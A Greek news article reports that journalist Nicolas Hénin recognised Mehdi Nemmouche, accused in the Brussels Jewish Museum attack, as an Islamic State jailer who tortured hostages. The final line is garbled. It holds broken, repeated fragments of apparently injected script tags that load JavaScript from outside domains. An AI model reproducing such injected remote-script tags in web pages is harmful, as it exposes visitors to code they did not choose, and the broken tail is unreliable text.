Αποκάλυψη Γάλλου δημοσιογράφου: Ο κατηγορούμενος για το μακελειό στο Εβραϊκό μουσείο ήταν βασανιστής ομήρων του Ισλαμικού Κράτους

Αποκάλυψη Γάλλου δημοσιογράφου: Ο κατηγορούμενος για το μακελειό στο Εβραϊκό μουσείο ήταν βασανιστής ομήρων του Ισλαμικού Κράτους

Ο Γάλλος δημοσιογράφος Νικολά Ενέν, πρώην όμηρος στη Συρία, αποκάλυψε ότι ο Μέχντι Νεμούς, ο Γάλλος τζιχαντιστής που κατηγορείται για την επίθεση στο Εβραϊκό Μουσείο των Βρυξελλών, υπήρξε ένας από τους δεσμοφύλακές του κατά τη διάρκεια της κράτησής του.

Οι τέσσερις γάλλοι δημοσιογράφοι που κρατήθηκαν όμηροι στη Συρία, ο Νικολά Ενέν, ο Πιερ Τορές, ο Ντιντιέ Φρανσουά και ο Εντουάρ Ελιάς- αναγνώρισαν τον Μεμούς σε φωτογραφίες μετά τη σύλληψή του τον Μάιο.

Η πληροφορία παρέμεινε μυστική, όμως το πειοδικό Le Point, για το οποίο εργάζεται ο Νικολά Ενέν, δημοσίευσε την συγκλονιστική μαρτυρία του, αφού η εφημερίδα Le Monde αποκάλυψε ότι ο Νεμούς “υπήρξε ένας από τους δεσμοφύλακες των δυτικών ομήρων” που κρατούνταν στη Συρία από το Ισλαμικό Κράτος. Ο Νικολά Ενέν εξήγησε ότι αποφάσισε να κάνει τις αποκαλύψεις για να ενημερωθεί η κοινή γνώμη.

Ο υπουργός Εσωτερικών της Γαλλίας Μπερνάρ Καζνέβ επιβεβαίωσε ότι οι υπηρεσίες “έχουν διαβιβάσει στη δικαιοσύνη στοιχεία που παραπέμπουν στο ενδεχόμενο ο Νεμπούς να έχει υπάρξει δεσμοφύλακας των ομήρων μας”, χωρίς να δώσει περισσότερες λεπτομέρειες.

Ο Νεμούς, 29 ετών, κρατείται στο Βέλγιο, όπου τού έχουν απαγγελθεί κατηγορίες για 4 δολοφονίες που διαπράχθηκαν στις 24 Μαΐου στο όνομα του “τζιχάντ” στο Εβραϊκό Μουσείο των Βρυξελλών.
Οταν συνελήφθη, στις 30 Μαΐου κατά τη διάρκεια έρευνας ρουτίνας στη Μασσαλία, οπλοφορούσε και είχε σημαία με το έμβλημα του Ισλαμικού Κράτους, καθώς και φιλμ που αναφερόταν στη σφαγή των Βρυξελλών. Ο Νεμούς, Γάλλος αλγερινής καταγωγής, είχε πάει στη Συρία για τον “τζιχάντ” και εντάχθηκε στις τάξεις του Ισλαμικού Κράτους.

Αμπού Ομαρ, ο βασανιστής

Ο Νικολά Ενέν, παρουσιάζει τον Νεμούς ως “Αμπού Ομαρ, ο βασανιστής”. Περιγράφει έναν Νεμούς “μέλος μίας μικρής ομάδας Γάλλων (δεσμοφυλάκων), η εμφάνιση του οποίου τρομοκρατούσε τους πενήντα περίπου σύρους κρατούμενους στα γειτονικά κελιά. Κάθε βράδυ, τα χτυπήματα άρχιζαν να πέφτουν βροχή στην αίθουσα όπου ανακρινόμουν και εγώ”, είπε.
“Οταν ο Νεμούς δεν τραγουδούσε, βασάνιζε”, γράφει ο δημοσιογράφος, που λέει ότι είχε και ο ίδιος δεχτεί τα χτυπήματα του άνδρα αυτού, που τον γνώριζε ως “Αμπού Ομαρ, ο βασανιστής”.

Τον περιγράφει στον περιοδικό le Point ως έναν δεσμοφύλακα “εγωκεντρικό και μυθομανή για τον οποίο ο τζιχάντ δεν είναι τελικά παρά το πρόσχημα για να κορέσει την αρρωστημένη δίψα του για καταξίωση. Ενα χαμένο κορμί, ένας διεστραμένος νέος”.

“Πιθανότατα δεν είχε έρθει στη Συρία για να πολεμήσει για κάποιο ιδεώδες, αλλά, πριν απ΄όλα, και χωρίς αμφιβολία λόγω έλλειψης αναγνώρισης, για να καταξιωθεί, για να πραγματοποιήσει κάποιου είδους δολοφονική εκστρατεία που είχε φτιάξει στο μυαλό του”, δήλωσε ο δημοσιογράφος κατά τη διάρκεια συνέντευξης Τύπου.

Λίγο μετά την απελευθέρωση των τεσσάρων γάλλων δημοσιογράφων, ο υπουργός Εξωτερικών της Γαλλίας Λοράν Φαμπιούς είχε δηλώσει ότι ορισμένοι από τους δεσμοφύλακές τους μιλούσαν γαλλικά.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >